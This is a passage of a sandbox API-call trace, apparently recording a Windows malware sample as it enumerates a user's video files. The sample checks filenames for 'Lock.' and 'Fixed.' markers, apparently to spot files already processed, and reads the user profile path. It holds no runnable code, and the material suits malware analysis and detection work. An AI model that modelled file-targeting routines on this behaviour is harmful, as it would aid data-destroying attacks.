(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.013] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe301f10, ftCreationTime.dwHighDateTime=0x1d4cbb9, ftLastAccessTime.dwLowDateTime=0xc659db20, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xc659db20, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0xc87b, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="afvn6kbS8JsNZy6W_IRM.mp4", cAlternateFileName="AFVN6K~1.MP4")) returned 1 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0257.013] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.013] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.013] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0257.014] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.014] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.014] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x24ab310, dwReserved1=0x25c6e50, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.014] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.015] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.015] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.015] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.016] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc3c900, ftCreationTime.dwHighDateTime=0x1d4c659, ftLastAccessTime.dwLowDateTime=0xba2bc700, ftLastAccessTime.dwHighDateTime=0x1d4d15a, ftLastWriteTime.dwLowDateTime=0xba2bc700, ftLastWriteTime.dwHighDateTime=0x1d4d15a, nFileSizeHigh=0x0, nFileSizeLow=0x13bd9, dwReserved0=0x24a9f60, dwReserved1=0x25c6e50, cFileName="eJwCkaX.avi", cAlternateFileName="")) returned 1 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.016] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67138a0, ftCreationTime.dwHighDateTime=0x1d4d171, ftLastAccessTime.dwLowDateTime=0x30a77050, ftLastAccessTime.dwHighDateTime=0x1d4d19c, ftLastWriteTime.dwLowDateTime=0x30a77050, ftLastWriteTime.dwHighDateTime=0x1d4d19c, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="EseSTJL.avi", cAlternateFileName="")) returned 1 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.017] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fddf00, ftCreationTime.dwHighDateTime=0x1d4d364, ftLastAccessTime.dwLowDateTime=0xbed2aea0, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xbed2aea0, ftLastWriteTime.dwHighDateTime=0x1d4c7ea, nFileSizeHigh=0x0, nFileSizeLow=0x15e14, dwReserved0=0x24ab310, dwReserved1=0x25c6e50, cFileName="EzPWeTUYQ0o54TxyD5.mkv", cAlternateFileName="EZPWET~1.MKV")) returned 1 [0257.017] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7bad60, ftCreationTime.dwHighDateTime=0x1d4c723, ftLastAccessTime.dwLowDateTime=0x5d997bf0, ftLastAccessTime.dwHighDateTime=0x1d4cd4e, ftLastWriteTime.dwLowDateTime=0x5d997bf0, ftLastWriteTime.dwHighDateTime=0x1d4cd4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9f60, dwReserved1=0x25c6e50, cFileName="o7xXPd8", cAlternateFileName="")) returned 1 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.026] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eaa2d20, ftCreationTime.dwHighDateTime=0x1d4cc59, ftLastAccessTime.dwLowDateTime=0x9d351340, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x9d351340, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="S8aFA8f.mkv", cAlternateFileName="")) returned 1 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1198, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9f60, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\xa75d\x01\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\x9708\x24a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.027] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0257.028] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.028] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.028] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.028] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.028] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Qauyoz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qauyoz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="auyoz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uyoz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yoz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oz6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.029] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Qauyoz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qauyoz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="auyoz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uyoz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yoz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oz6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z6.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.030] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.030] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0257.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.031] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.031] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 